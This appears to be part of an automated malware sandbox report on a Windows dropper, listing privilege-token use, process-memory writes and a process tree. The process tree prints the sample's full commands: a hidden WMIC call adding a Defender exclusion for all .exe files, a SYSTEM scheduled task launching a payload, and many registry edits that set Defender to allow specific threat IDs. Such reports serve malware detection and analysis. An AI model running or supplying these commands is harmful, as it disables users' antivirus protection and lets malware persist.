N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3936 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe

.\Install.exe /hDJuIdidFXt "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe\" 1V /mdsite_idLGV 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe 1V /mdsite_idLGV 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

